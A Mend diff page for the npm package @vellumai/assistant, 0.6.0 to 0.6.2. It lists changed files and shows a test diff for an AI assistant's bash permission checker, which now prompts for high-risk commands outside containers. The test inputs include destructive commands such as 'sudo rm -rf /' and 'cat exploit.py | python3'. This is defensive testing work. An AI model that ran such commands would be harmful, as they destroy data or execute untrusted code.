npm - @vellumai/assistant - Versions diffs - 0.6.0 → 0.6.2 - Mend

@vellumai/assistant 0.6.0 → 0.6.2

This diff shows the changes between publicly available versions of this package that have been released to one of the supported registries. It is provided for informational purposes only and reflects the differences between the package versions as they appear in their respective public registries.

Files changed (358) hide show

package/AGENTS.md +4 -0
package/ARCHITECTURE.md +68 -15
package/Dockerfile +2 -2
package/bun.lock +6 -2
package/docker-entrypoint.sh +42 -1
package/docs/architecture/integrations.md +1 -1
package/docs/architecture/memory.md +21 -24
package/node_modules/@vellumai/ces-contracts/src/handles.ts +7 -9
package/openapi.yaml +539 -4
package/package.json +5 -1
package/src/__tests__/anthropic-provider.test.ts +160 -95
package/src/__tests__/app-dir-path-guard.test.ts +1 -0
package/src/__tests__/app-executors.test.ts +47 -1
package/src/__tests__/app-source-watcher.test.ts +159 -0
package/src/__tests__/assistant-event-hub.test.ts +30 -0
package/src/__tests__/checker.test.ts +138 -172
package/src/__tests__/cli-command-risk-guard.test.ts +1 -1
package/src/__tests__/config-schema.test.ts +5 -0
package/src/__tests__/context-overflow-approval.test.ts +5 -5
package/src/__tests__/conversation-agent-loop-overflow.test.ts +4 -6
package/src/__tests__/conversation-agent-loop.test.ts +4 -51
package/src/__tests__/conversation-analysis-routes.test.ts +169 -0
package/src/__tests__/conversation-directories-parse.test.ts +105 -0
package/src/__tests__/conversation-history-web-search.test.ts +1 -1
package/src/__tests__/conversation-runtime-assembly.test.ts +653 -832
package/src/__tests__/conversation-runtime-workspace.test.ts +1 -93
package/src/__tests__/conversation-tool-setup-app-refresh.test.ts +17 -4
package/src/__tests__/conversation-wipe.test.ts +2 -6
package/src/__tests__/conversation-workspace-cache-state.test.ts +6 -12
package/src/__tests__/conversation-workspace-injection.test.ts +25 -26
package/src/__tests__/conversation-workspace-tool-tracking.test.ts +1 -1
package/src/__tests__/copy-composer-tc-templates.test.ts +335 -0
package/src/__tests__/credential-execution-approval-bridge.test.ts +0 -2
package/src/__tests__/date-context.test.ts +76 -210
package/src/__tests__/db-schedule-syntax-migration.test.ts +16 -1
package/src/__tests__/file-list-tool.test.ts +219 -0
package/src/__tests__/first-greeting.test.ts +1 -1
package/src/__tests__/heartbeat-service.test.ts +180 -3
package/src/__tests__/identity-routes.test.ts +328 -0
package/src/__tests__/init-feature-flag-overrides.test.ts +167 -0
package/src/__tests__/injection-block.test.ts +24 -0
package/src/__tests__/inline-command-runner.test.ts +7 -5
package/src/__tests__/install-skill-routing.test.ts +7 -6
package/src/__tests__/jobs-store-qdrant-breaker.test.ts +15 -14
package/src/__tests__/list-messages-tool-merge.test.ts +300 -0
package/src/__tests__/llm-context-normalization.test.ts +18 -18
package/src/__tests__/llm-context-route-provider.test.ts +101 -0
package/src/__tests__/llm-request-log-turn-query.test.ts +162 -0
package/src/__tests__/log-export-workspace.test.ts +257 -100
package/src/__tests__/managed-credential-catalog-cli.test.ts +12 -14
package/src/__tests__/mcp-abort-signal.test.ts +5 -0
package/src/__tests__/mcp-client-auth.test.ts +5 -0
package/src/__tests__/memory-recall-log-store.test.ts +132 -0
package/src/__tests__/migration-export-streaming.test.ts +304 -0
package/src/__tests__/migration-import-commit-http.test.ts +11 -10
package/src/__tests__/mock-fetch.ts +87 -0
package/src/__tests__/navigate-settings-tab.test.ts +14 -1
package/src/__tests__/notification-broadcaster.test.ts +65 -0
package/src/__tests__/notification-decision-recipient-context.test.ts +282 -0
package/src/__tests__/onboarding-template-contract.test.ts +63 -14
package/src/__tests__/parser.test.ts +32 -0
package/src/__tests__/permission-checker-host-gate.test.ts +452 -0
package/src/__tests__/permission-controls-v2-flag.test.ts +55 -0
package/src/__tests__/permission-mode-sse.test.ts +418 -0
package/src/__tests__/permission-mode-store.test.ts +277 -0
package/src/__tests__/permission-mode.test.ts +101 -0
package/src/__tests__/pkb-autoinject.test.ts +96 -0
package/src/__tests__/platform-bash-auto-approve.test.ts +359 -0
package/src/__tests__/profiler-routes.test.ts +502 -0
package/src/__tests__/profiler-run-store.test.ts +441 -0
package/src/__tests__/proxy-approval-callback.test.ts +4 -75
package/src/__tests__/registry.test.ts +1 -1
package/src/__tests__/require-fresh-approval.test.ts +0 -2
package/src/__tests__/sandbox-diagnostics.test.ts +1 -32
package/src/__tests__/sandbox-host-parity.test.ts +5 -4
package/src/__tests__/scheduler-reuse-conversation.test.ts +368 -0
package/src/__tests__/scrub-corrupted-image-attachments.test.ts +278 -0
package/src/__tests__/search-skills-unified.test.ts +4 -3
package/src/__tests__/send-endpoint-busy.test.ts +42 -3
package/src/__tests__/set-permission-mode.test.ts +274 -0
package/src/__tests__/skill-load-feature-flag.test.ts +12 -0
package/src/__tests__/skill-memory.test.ts +2 -783
package/src/__tests__/strip-memory-injections.test.ts +187 -0
package/src/__tests__/subagent-detail.test.ts +84 -0
package/src/__tests__/subagent-disposal.test.ts +308 -0
package/src/__tests__/subagent-manager-notify.test.ts +19 -10
package/src/__tests__/subagent-notify-parent.test.ts +390 -0
package/src/__tests__/subagent-role-registry.test.ts +108 -0
package/src/__tests__/subagent-tool-filtering.test.ts +71 -0
package/src/__tests__/subagent-tools.test.ts +464 -4
package/src/__tests__/system-prompt-ask-mode.test.ts +139 -0
package/src/__tests__/task-memory-cleanup.test.ts +12 -12
package/src/__tests__/terminal-sandbox.test.ts +1 -1
package/src/__tests__/terminal-tools.test.ts +16 -29
package/src/__tests__/test-preload.ts +18 -0
package/src/__tests__/tool-domain-event-publisher.test.ts +0 -1
package/src/__tests__/tool-executor-lifecycle-events.test.ts +1 -8
package/src/__tests__/tool-executor.test.ts +4 -27
package/src/__tests__/tool-side-effects-slack-dm.test.ts +1 -0
package/src/__tests__/top-level-renderer.test.ts +10 -13
package/src/__tests__/transport-hints-queue.test.ts +77 -0
package/src/__tests__/trust-store.test.ts +4 -4
package/src/__tests__/trusted-contact-lifecycle-notifications.test.ts +116 -2
package/src/__tests__/workspace-migration-028-recover-conversations-from-disk-view.test.ts +387 -0
package/src/__tests__/workspace-migration-030-seed-pkb-autoinject.test.ts +168 -0
package/src/__tests__/workspace-policy.test.ts +2 -7
package/src/agent/loop.ts +6 -29
package/src/approvals/guardian-request-resolvers.ts +24 -0
package/src/avatar/traits-png-sync.ts +3 -3
package/src/channels/types.ts +5 -0
package/src/cli/__tests__/run-assistant-command.ts +56 -0
package/src/cli/__tests__/unknown-command.test.ts +33 -0
package/src/cli/commands/__tests__/email-download.test.ts +245 -0
package/src/cli/commands/__tests__/email-list.test.ts +192 -0
package/src/cli/commands/__tests__/email-register.test.ts +186 -0
package/src/cli/commands/__tests__/email-send.test.ts +291 -0
package/src/cli/commands/__tests__/email-status.test.ts +181 -0
package/src/cli/commands/__tests__/email-unregister.test.ts +139 -0
package/src/cli/commands/__tests__/routes.test.ts +562 -0
package/src/cli/commands/conversations.ts +1 -8
package/src/cli/commands/default-action.ts +68 -1
package/src/cli/commands/email.ts +584 -835
package/src/cli/commands/memory.ts +1 -34
package/src/cli/commands/notifications.ts +7 -2
package/src/cli/commands/oauth/__tests__/connect.test.ts +27 -0
package/src/cli/commands/oauth/connect.ts +25 -5
package/src/cli/commands/platform/__tests__/connect.test.ts +1 -1
package/src/cli/commands/platform/__tests__/disconnect.test.ts +1 -1
package/src/cli/commands/platform/__tests__/status.test.ts +1 -1
package/src/cli/commands/routes.ts +396 -0
package/src/cli/commands/skills.ts +130 -20
package/src/cli/program.ts +11 -2
package/src/cli.ts +1 -120
package/src/config/assistant-feature-flags.ts +59 -55
package/src/config/bundled-skills/app-builder/SKILL.md +91 -5
package/src/config/bundled-skills/gmail/SKILL.md +13 -8
package/src/config/bundled-skills/gmail/TOOLS.json +1 -1
package/src/config/bundled-skills/gmail/tools/gmail-sender-digest.ts +2 -1
package/src/config/bundled-skills/messaging/SKILL.md +7 -0
package/src/config/bundled-skills/schedule/SKILL.md +22 -2
package/src/config/bundled-skills/schedule/TOOLS.json +8 -0
package/src/config/bundled-skills/settings/TOOLS.json +1 -1
package/src/config/bundled-skills/settings/tools/avatar-get.ts +3 -13
package/src/config/bundled-skills/settings/tools/avatar-remove.ts +2 -4
package/src/config/bundled-skills/settings/tools/avatar-update.ts +5 -2
package/src/config/bundled-skills/settings/tools/navigate-settings-tab.ts +8 -3
package/src/config/bundled-skills/slack/SKILL.md +2 -0
package/src/config/bundled-skills/subagent/SKILL.md +43 -3
package/src/config/bundled-skills/subagent/TOOLS.json +29 -4
package/src/config/env-registry.ts +63 -0
package/src/config/feature-flag-registry.json +17 -1
package/src/config/schema.ts +8 -0
package/src/config/schemas/filing.ts +51 -0
package/src/config/schemas/heartbeat.ts +15 -12
package/src/config/schemas/memory-lifecycle.ts +12 -0
package/src/config/schemas/security.ts +14 -0
package/src/config/schemas/services.ts +8 -0
package/src/credential-execution/approval-bridge.ts +0 -1
package/src/credential-execution/managed-catalog.ts +3 -7
package/src/daemon/app-source-watcher.ts +93 -0
package/src/daemon/config-watcher.ts +85 -3
package/src/daemon/context-overflow-approval.ts +0 -1
package/src/daemon/conversation-agent-loop-handlers.ts +20 -0
package/src/daemon/conversation-agent-loop.ts +179 -65
package/src/daemon/conversation-attachments.ts +0 -1
package/src/daemon/conversation-history.ts +4 -19
package/src/daemon/conversation-lifecycle.ts +8 -14
package/src/daemon/conversation-messaging.ts +3 -0
package/src/daemon/conversation-process.ts +30 -8
package/src/daemon/conversation-queue-manager.ts +8 -0
package/src/daemon/conversation-runtime-assembly.ts +359 -308
package/src/daemon/conversation-surfaces.ts +65 -0
package/src/daemon/conversation-tool-setup.ts +44 -17
package/src/daemon/conversation-workspace.ts +1 -2
package/src/daemon/conversation.ts +19 -3
package/src/daemon/date-context.ts +26 -53
package/src/daemon/first-greeting.ts +1 -1
package/src/daemon/handlers/conversations.ts +5 -7
package/src/daemon/handlers/shared.test.ts +143 -0
package/src/daemon/handlers/shared.ts +70 -5
package/src/daemon/handlers/skills.ts +11 -18
package/src/daemon/lifecycle.ts +220 -158
package/src/daemon/message-types/conversations.ts +29 -6
package/src/daemon/message-types/messages.ts +9 -2
package/src/daemon/message-types/notifications.ts +12 -0
package/src/daemon/message-types/schedules.ts +1 -0
package/src/daemon/message-types/settings.ts +18 -0
package/src/daemon/profiler-run-store.ts +557 -0
package/src/daemon/server.ts +87 -10
package/src/daemon/shutdown-handlers.ts +5 -0
package/src/daemon/tool-side-effects.ts +23 -3
package/src/daemon/transport-hints.ts +33 -0
package/src/export/transcript-formatter.ts +148 -0
package/src/filing/filing-service.ts +228 -0
package/src/heartbeat/heartbeat-service.ts +96 -7
package/src/index.ts +1 -1
package/src/mcp/client.ts +6 -0
package/src/mcp/mcp-oauth-provider.ts +149 -27
package/src/memory/admin.ts +33 -32
package/src/memory/app-store.ts +69 -0
package/src/memory/conversation-bootstrap.ts +1 -1
package/src/memory/conversation-crud.ts +151 -117
package/src/memory/conversation-directories.ts +39 -0
package/src/memory/conversation-group-migration.ts +66 -6
package/src/memory/conversation-queries.ts +58 -12
package/src/memory/conversation-title-service.ts +1 -0
package/src/memory/db-init.ts +182 -376
package/src/memory/embedding-local.ts +1 -1
package/src/memory/graph/bootstrap.ts +75 -66
package/src/memory/graph/capability-seed.ts +167 -17
package/src/memory/graph/consolidation.ts +38 -4
package/src/memory/graph/conversation-graph-memory.ts +133 -104
package/src/memory/graph/extraction-job.ts +9 -4
package/src/memory/graph/extraction.ts +66 -23
package/src/memory/graph/graph-memory-state-store.ts +37 -0
package/src/memory/graph/graph-search.ts +29 -15
package/src/memory/graph/injection.ts +38 -8
package/src/memory/graph/inspect.ts +12 -3
package/src/memory/graph/retriever.ts +365 -262
package/src/memory/graph/store.test.ts +48 -0
package/src/memory/graph/store.ts +150 -11
package/src/memory/graph/tool-handlers.ts +84 -209
package/src/memory/graph/tools.ts +8 -52
package/src/memory/graph/types.ts +24 -0
package/src/memory/group-crud.ts +25 -9
package/src/memory/job-handlers/cleanup.ts +44 -1
package/src/memory/jobs-store.ts +70 -60
package/src/memory/jobs-worker.ts +44 -28
package/src/memory/llm-request-log-store.ts +96 -12
package/src/memory/memory-recall-log-store.ts +49 -5
package/src/memory/migrations/203-drop-memory-items-tables.ts +33 -1
package/src/memory/migrations/206-memory-graph-node-edits.ts +19 -0
package/src/memory/migrations/206-scrub-corrupted-image-attachments.ts +131 -0
package/src/memory/migrations/207-conversation-graph-memory-state.ts +20 -0
package/src/memory/migrations/208-conversations-last-message-at.ts +35 -0
package/src/memory/migrations/209-strip-thinking-from-consolidated.ts +85 -0
package/src/memory/migrations/210-schedule-reuse-conversation.ts +13 -0
package/src/memory/migrations/211-memory-recall-logs-query-context.ts +21 -0
package/src/memory/migrations/212-llm-request-logs-created-at-index.ts +19 -0
package/src/memory/migrations/index.ts +8 -0
package/src/memory/migrations/registry.ts +8 -0
package/src/memory/schema/conversations.ts +14 -0
package/src/memory/schema/infrastructure.ts +8 -1
package/src/memory/schema/memory-core.ts +0 -51
package/src/memory/schema/memory-graph.ts +15 -0
package/src/memory/task-memory-cleanup.ts +30 -11
package/src/messaging/provider.ts +1 -1
package/src/notifications/broadcaster.ts +6 -0
package/src/notifications/conversation-pairing.ts +12 -4
package/src/notifications/copy-composer.ts +86 -0
package/src/notifications/decision-engine.ts +35 -0
package/src/notifications/emit-signal.ts +14 -0
package/src/notifications/signal.ts +11 -0
package/src/oauth/platform-connection.test.ts +2 -2
package/src/oauth/seed-providers.ts +1 -0
package/src/permissions/checker.ts +15 -4
package/src/permissions/defaults.ts +7 -8
package/src/permissions/permission-mode-store.ts +180 -0
package/src/permissions/permission-mode.ts +31 -0
package/src/permissions/prompter.ts +0 -2
package/src/permissions/workspace-policy.ts +9 -0
package/src/platform/client.ts +1 -1
package/src/prompts/system-prompt.ts +59 -7
package/src/prompts/templates/BOOTSTRAP-REFERENCE.md +100 -0
package/src/prompts/templates/BOOTSTRAP.md +76 -162
package/src/prompts/templates/HEARTBEAT.md +3 -1
package/src/prompts/templates/SOUL.md +30 -9
package/src/prompts/templates/UPDATES.md +8 -0
package/src/providers/anthropic/client.ts +107 -219
package/src/runtime/assistant-event-hub.ts +22 -0
package/src/runtime/auth/route-policy.ts +23 -0
package/src/runtime/auth/token-service.ts +8 -0
package/src/runtime/http-server.ts +32 -2
package/src/runtime/http-types.ts +12 -1
package/src/runtime/migrations/vbundle-builder.ts +389 -3
package/src/runtime/migrations/vbundle-importer.ts +8 -6
package/src/runtime/routes/__tests__/user-route-dispatcher.test.ts +378 -0
package/src/runtime/routes/app-management-routes.ts +1 -11
package/src/runtime/routes/approval-strategies/guardian-callback-strategy.ts +26 -0
package/src/runtime/routes/archive-utils.ts +29 -0
package/src/runtime/routes/avatar-routes.ts +2 -9
package/src/runtime/routes/btw-routes.ts +14 -1
package/src/runtime/routes/conversation-analysis-routes.ts +185 -0
package/src/runtime/routes/conversation-management-routes.ts +1 -14
package/src/runtime/routes/conversation-query-routes.ts +49 -3
package/src/runtime/routes/conversation-routes.ts +270 -44
package/src/runtime/routes/group-routes.ts +22 -8
package/src/runtime/routes/heartbeat-routes.ts +4 -10
package/src/runtime/routes/identity-routes.ts +53 -18
package/src/runtime/routes/llm-context-normalization.ts +14 -10
package/src/runtime/routes/log-export/AGENTS.md +104 -0
package/src/runtime/routes/log-export/__tests__/workspace-allowlist-error-contract.test.ts +103 -0
package/src/runtime/routes/log-export/__tests__/workspace-allowlist.test.ts +716 -0
package/src/runtime/routes/log-export/workspace-allowlist.ts +458 -0
package/src/runtime/routes/log-export-routes.ts +41 -278
package/src/runtime/routes/memory-item-routes.test.ts +168 -233
package/src/runtime/routes/migration-routes.ts +18 -7
package/src/runtime/routes/profiler-routes.ts +350 -0
package/src/runtime/routes/schedule-routes.ts +27 -12
package/src/runtime/routes/settings-routes.ts +95 -8
package/src/runtime/routes/subagents-routes.ts +28 -7
package/src/runtime/routes/user-route-dispatcher.ts +223 -0
package/src/runtime/routes/user-routes.ts +41 -0
package/src/runtime/routes/workspace-routes.ts +0 -1
package/src/schedule/schedule-store.ts +30 -0
package/src/schedule/scheduler.ts +45 -18
package/src/skills/catalog-install.ts +10 -2
package/src/skills/inline-command-runner.ts +12 -14
package/src/skills/managed-store.ts +2 -2
package/src/skills/skill-memory.ts +1 -293
package/src/subagent/index.ts +13 -3
package/src/subagent/manager.ts +308 -29
package/src/subagent/types.ts +68 -0
package/src/tasks/task-runner.ts +4 -4
package/src/tools/apps/executors.ts +29 -4
package/src/tools/filesystem/list.ts +93 -0
package/src/tools/permission-checker.ts +78 -18
package/src/tools/registry.ts +4 -0
package/src/tools/schedule/create.ts +3 -0
package/src/tools/schedule/list.ts +1 -0
package/src/tools/schedule/update.ts +6 -0
package/src/tools/secret-detection-handler.ts +0 -1
package/src/tools/shared/filesystem/errors.ts +5 -0
package/src/tools/shared/filesystem/file-ops-service.ts +90 -2
package/src/tools/shared/filesystem/types.ts +17 -0
package/src/tools/shared/shell-output.ts +31 -2
package/src/tools/skills/sandbox-runner.ts +3 -6
package/src/tools/subagent/abort.ts +12 -2
package/src/tools/subagent/message.ts +9 -2
package/src/tools/subagent/notify-parent.ts +79 -0
package/src/tools/subagent/read.ts +29 -8
package/src/tools/subagent/resolve.ts +21 -0
package/src/tools/subagent/spawn.ts +2 -0
package/src/tools/subagent/status.ts +11 -1
package/src/tools/system/avatar-generator.ts +3 -3
package/src/tools/system/register.ts +23 -0
package/src/tools/system/set-permission-mode.ts +103 -0
package/src/tools/terminal/parser.ts +30 -5
package/src/tools/terminal/safe-env.ts +16 -1
package/src/tools/terminal/sandbox-diagnostics.ts +4 -4
package/src/tools/terminal/sandbox.ts +4 -1
package/src/tools/terminal/shell.ts +3 -5
package/src/tools/tool-manifest.ts +6 -0
package/src/tools/types.ts +2 -3
package/src/util/logger.ts +1 -1
package/src/util/platform.ts +50 -17
package/src/watcher/provider-types.ts +1 -1
package/src/workspace/migrations/023-move-config-files-to-workspace.ts +2 -2
package/src/workspace/migrations/024-move-runtime-files-to-workspace.ts +2 -2
package/src/workspace/migrations/028-recover-conversations-from-disk-view.ts +270 -0
package/src/workspace/migrations/029-seed-pkb.ts +85 -0
package/src/workspace/migrations/030-seed-pkb-autoinject.ts +73 -0
package/src/workspace/migrations/registry.ts +6 -0
package/src/workspace/top-level-renderer.ts +5 -9
package/src/__tests__/cli-memory.test.ts +0 -377
package/src/__tests__/clipboard.test.ts +0 -88
package/src/cli/cli-memory.ts +0 -179
package/src/util/clipboard.ts +0 -34

package/src/__tests__/checker.test.ts CHANGED Viewed

@@ -48,14 +48,12 @@ mock.module("../util/logger.js", () => ({
 interface TestConfig {
   permissions: { mode: "strict" | "workspace" };
   skills: { load: { extraDirs: string[] } };
-  sandbox: { enabled: boolean };
   [key: string]: unknown;
 }
 const testConfig: TestConfig = {
   permissions: { mode: "workspace" },
   skills: { load: { extraDirs: [] } },
-  sandbox: { enabled: true },
 };
 mock.module("../config/loader.js", () => ({
@@ -640,49 +638,23 @@ describe("Permission Checker", () => {
   // ── check (decision logic) ─────────────────────────────────────
   describe("check", () => {
-    test("sandbox bash auto-allows all risk levels via default rule", async () => {
-      // High risk
+    test("bash follows risk-based policy (no default allow rule outside container)", async () => {
+      // High risk → prompt
       const high = await check("bash", { command: "sudo rm -rf /" }, "/tmp");
-      expect(high.decision).toBe("allow");
-      expect(high.matchedRule?.id).toBe("default:allow-bash-global");
+      expect(high.decision).toBe("prompt");
-      // Medium risk
+      // Medium risk → prompt
       const med = await check(
         "bash",
         { command: "curl https://example.com" },
         "/tmp",
       );
-      expect(med.decision).toBe("allow");
-      expect(med.matchedRule?.id).toBe("default:allow-bash-global");
+      expect(med.decision).toBe("prompt");
-      // Low risk
+      // Low risk → auto-allowed via risk-based fallback
       const low = await check("bash", { command: "ls" }, "/tmp");
       expect(low.decision).toBe("allow");
-      expect(low.matchedRule?.id).toBe("default:allow-bash-global");
-    });
-    test("bash prompts when sandbox is disabled (no global allow rule)", async () => {
-      testConfig.sandbox.enabled = false;
-      clearCache();
-      try {
-        const high = await check("bash", { command: "sudo rm -rf /" }, "/tmp");
-        expect(high.decision).toBe("prompt");
-        const med = await check(
-          "bash",
-          { command: "curl https://example.com" },
-          "/tmp",
-        );
-        expect(med.decision).toBe("prompt");
-        // Low risk still auto-allows via the normal risk-based fallback
-        const low = await check("bash", { command: "ls" }, "/tmp");
-        expect(low.decision).toBe("allow");
-        expect(low.reason).toContain("Low risk");
-      } finally {
-        testConfig.sandbox.enabled = true;
-        clearCache();
-      }
+      expect(low.reason).toContain("Low risk");
     });
     test("host_bash high risk → always prompt", async () => {
@@ -2337,11 +2309,11 @@ describe("Permission Checker", () => {
   // ── strict mode: no implicit allow (PR 21) ───────────────────
   describe("strict mode — no implicit allow (PR 21)", () => {
-    test("sandbox bash auto-allows in strict mode (default rule is a matching rule)", async () => {
+    test("bash prompts in strict mode (no default allow rule outside container)", async () => {
       testConfig.permissions.mode = "strict";
       const result = await check("bash", { command: "ls" }, "/tmp");
-      expect(result.decision).toBe("allow");
-      expect(result.matchedRule?.id).toBe("default:allow-bash-global");
+      expect(result.decision).toBe("prompt");
+      expect(result.reason).toContain("Strict mode");
     });
     test("host_bash prompts low risk in strict mode (default ask rule matches)", async () => {
@@ -2462,10 +2434,9 @@ describe("Permission Checker", () => {
       expect(result.decision).toBe("prompt");
     });
-    test("sandbox bash auto-allows high-risk via default allowHighRisk rule", async () => {
+    test("bash prompts for high-risk without default allow rule", async () => {
       const result = await check("bash", { command: "sudo rm -rf /" }, "/tmp");
-      expect(result.decision).toBe("allow");
-      expect(result.matchedRule?.id).toBe("default:allow-bash-global");
+      expect(result.decision).toBe("prompt");
     });
     test("medium-risk tool with allow rule is NOT affected by allowHighRisk", async () => {
@@ -3657,11 +3628,11 @@ describe("Permission Checker", () => {
     //    explicit matching rule. ──────────────────────────────────────
     describe("Invariant 1: strict mode requires explicit matching rule for every tool", () => {
-      test("sandbox bash auto-allows in strict mode (default rule matches)", async () => {
+      test("bash prompts in strict mode (no default allow rule outside container)", async () => {
         testConfig.permissions.mode = "strict";
         const result = await check("bash", { command: "echo hello" }, "/tmp");
-        expect(result.decision).toBe("allow");
-        expect(result.matchedRule?.id).toBe("default:allow-bash-global");
+        expect(result.decision).toBe("prompt");
+        expect(result.reason).toContain("Strict mode");
       });
       test("low-risk host_bash prompts in strict mode (default ask rule matches)", async () => {
@@ -3709,15 +3680,14 @@ describe("Permission Checker", () => {
         expect(result.reason).toContain("Strict mode");
       });
-      test("high-risk sandbox bash auto-allows in strict mode (default allowHighRisk rule)", async () => {
+      test("high-risk bash prompts in strict mode (no default allow rule outside container)", async () => {
         testConfig.permissions.mode = "strict";
         const result = await check(
           "bash",
           { command: "sudo apt update" },
           "/tmp",
         );
-        expect(result.decision).toBe("allow");
-        expect(result.matchedRule?.id).toBe("default:allow-bash-global");
+        expect(result.decision).toBe("prompt");
       });
       test("high-risk host_bash command with no user rule prompts in strict mode", async () => {
@@ -4130,20 +4100,39 @@ describe("Permission Checker", () => {
     test("getDefaultRuleTemplates tolerates partial config mocks", () => {
       const originalSkills = testConfig.skills;
-      const originalSandbox = testConfig.sandbox;
       try {
         testConfig.skills = {} as any;
-        testConfig.sandbox = {} as any;
         const templates = getDefaultRuleTemplates();
         expect(Array.isArray(templates)).toBe(true);
         expect(templates.some((t) => t.id.includes("extra-"))).toBe(false);
+        // bash allow rule is conditional on IS_CONTAINERIZED, not present in test env
         expect(
           templates.some((t) => t.id === "default:allow-bash-global"),
-        ).toBe(true);
+        ).toBe(false);
       } finally {
         testConfig.skills = originalSkills;
-        testConfig.sandbox = originalSandbox;
+      }
+    });
+    test("getDefaultRuleTemplates includes bash allow rule when IS_CONTAINERIZED", () => {
+      const orig = process.env.IS_CONTAINERIZED;
+      process.env.IS_CONTAINERIZED = "true";
+      try {
+        const templates = getDefaultRuleTemplates();
+        const bashRule = templates.find(
+          (t) => t.id === "default:allow-bash-global",
+        );
+        expect(bashRule).toBeDefined();
+        expect(bashRule!.tool).toBe("bash");
+        expect(bashRule!.pattern).toBe("**");
+        expect(bashRule!.allowHighRisk).toBe(true);
+      } finally {
+        if (orig === undefined) {
+          delete process.env.IS_CONTAINERIZED;
+        } else {
+          process.env.IS_CONTAINERIZED = orig;
+        }
       }
     });
   });
@@ -4400,22 +4389,58 @@ describe("Permission Checker", () => {
   });
 });
-describe("bash network_mode=proxied — no special-casing", () => {
+describe("bash network_mode=proxied — risk capped at medium", () => {
   beforeEach(() => {
     clearCache();
     testConfig.permissions = { mode: "workspace" };
     testConfig.skills = { load: { extraDirs: [] } };
   });
-  test("proxied bash follows normal rules (auto-allowed by default rule)", async () => {
-    // Proxied bash is no longer force-prompted — the default allow-bash rule
-    // auto-allows low/medium risk commands regardless of network_mode.
+  test("proxied bash follows risk-based policy (medium risk → prompt outside container)", async () => {
     const result = await check(
       "bash",
       { command: "curl https://api.example.com", network_mode: "proxied" },
       "/tmp",
     );
-    expect(result.decision).toBe("allow");
+    // Without the containerized bash allow rule, proxied medium-risk bash prompts
+    expect(result.decision).toBe("prompt");
+  });
+  test("proxied bash caps high-risk commands to medium", async () => {
+    // pipe-to-interpreter (stdin exec) is normally High risk, but proxied mode caps at Medium
+    const risk = await classifyRisk("bash", {
+      command: "cat exploit.py | python3",
+      network_mode: "proxied",
+    });
+    expect(risk).toBe(RiskLevel.Medium);
+  });
+  test("pipe to python3 -c is not high risk (inline code, not stdin exec)", async () => {
+    const risk = await classifyRisk("bash", {
+      command:
+        'cat data.json | python3 -c "import sys; print(sys.stdin.read())"',
+    });
+    expect(risk).toBe(RiskLevel.Low);
+  });
+  test("pipe to python3 without -c is high risk (stdin exec)", async () => {
+    const risk = await classifyRisk("bash", {
+      command: "cat exploit.py | python3",
+    });
+    expect(risk).toBe(RiskLevel.High);
+  });
+  test("proxied bash with high-risk command prompts (medium risk cap, no default allow rule)", async () => {
+    const result = await check(
+      "bash",
+      {
+        command: "cat exploit.py | python3",
+        network_mode: "proxied",
+      },
+      "/tmp",
+    );
+    // High risk capped to medium by proxied mode, but still prompts without the bash allow rule
+    expect(result.decision).toBe("prompt");
   });
   test("host_bash with network_mode=proxied follows normal flow", async () => {
@@ -4643,8 +4668,8 @@ describe("scope matching behavior", () => {
       { command: "npm install" },
       "/home/user/other-project",
     );
-    // npm install is Low risk, so it falls through to auto-allow via the
-    // default sandbox bash rule, not via the project-scoped rule.
+    // npm install is Low risk, so it's auto-allowed via the risk-based
+    // fallback, not via the project-scoped rule.
     // The key assertion is that the project-scoped rule is NOT the matched rule.
     if (result.matchedRule) {
       expect(result.matchedRule.scope).not.toBe(projectDir);
@@ -4726,80 +4751,37 @@ describe("workspace mode — auto-allow workspace-scoped operations", () => {
     expect(result.reason).toContain("Low risk");
   });
-  // ── bash (sandbox) — default rule matches, workspace mode not reached ──
+  // ── bash (non-containerized) — workspace auto-allow blocked, risk-based fallback ──
-  test("bash in workspace with sandbox (non-proxied) → allow via default rule", async () => {
+  test("bash in workspace (low risk) → allow via risk-based fallback, not workspace mode", async () => {
     const result = await check("bash", { command: "ls -la" }, workspaceDir);
     expect(result.decision).toBe("allow");
-    // Allowed via the default sandbox bash rule, not workspace mode
-    expect(result.matchedRule?.id).toBe("default:allow-bash-global");
-  });
-  // ── bash sandbox gate — workspace auto-allow depends on sandbox being enabled ──
-  test("bash with sandbox disabled in workspace mode → falls through to risk-based policy (not auto-allowed)", async () => {
-    const origSandbox = testConfig.sandbox.enabled;
-    testConfig.sandbox.enabled = false;
-    try {
-      const result = await check(
-        "bash",
-        { command: "echo hello" },
-        workspaceDir,
-      );
-      // Should NOT be auto-allowed via workspace mode
-      expect(result.reason).not.toContain("Workspace mode");
-      // With sandbox disabled, no default bash allow rule either, so it falls through to risk-based policy
-      expect(result.decision).toBe("allow");
-      expect(result.reason).toContain("Low risk");
-    } finally {
-      testConfig.sandbox.enabled = origSandbox;
-    }
-  });
-  test("bash with sandbox enabled in workspace mode → auto-allowed via default rule", async () => {
-    const origSandbox = testConfig.sandbox.enabled;
-    testConfig.sandbox.enabled = true;
-    try {
-      const result = await check(
-        "bash",
-        { command: "echo hello" },
-        workspaceDir,
-      );
-      expect(result.decision).toBe("allow");
-      // With sandbox enabled, the default bash allow rule matches before workspace mode
-      expect(result.matchedRule?.id).toBe("default:allow-bash-global");
-    } finally {
-      testConfig.sandbox.enabled = origSandbox;
-    }
+    // Not auto-allowed via workspace mode — bash falls through to risk-based policy
+    expect(result.reason).not.toContain("Workspace mode");
+    expect(result.reason).toContain("Low risk");
   });
-  test("bash with sandbox disabled in workspace mode — medium risk command → prompt (not auto-allowed)", async () => {
-    const origSandbox = testConfig.sandbox.enabled;
-    testConfig.sandbox.enabled = false;
-    try {
-      // An unknown program is medium risk; without sandbox, workspace auto-allow is blocked
-      const result = await check(
-        "bash",
-        { command: "some-unknown-program --flag" },
-        workspaceDir,
-      );
-      expect(result.reason).not.toContain("Workspace mode");
-      expect(result.decision).toBe("prompt");
-    } finally {
-      testConfig.sandbox.enabled = origSandbox;
-    }
+  test("bash in workspace (medium risk) → prompt (not auto-allowed)", async () => {
+    // An unknown program is medium risk; without container, workspace auto-allow is blocked
+    const result = await check(
+      "bash",
+      { command: "some-unknown-program --flag" },
+      workspaceDir,
+    );
+    expect(result.reason).not.toContain("Workspace mode");
+    expect(result.decision).toBe("prompt");
   });
-  // ── proxied bash — follows normal rules (no special-casing) ──
+  // ── proxied bash — risk capped at medium ──
-  test("bash with network_mode=proxied → allow (follows normal rules in workspace mode)", async () => {
+  test("bash with network_mode=proxied → prompt (medium risk, not auto-allowed outside container)", async () => {
     const result = await check(
       "bash",
       { command: "curl https://api.example.com", network_mode: "proxied" },
       workspaceDir,
     );
-    // Default allow-bash rule auto-allows; proxied mode is not special-cased.
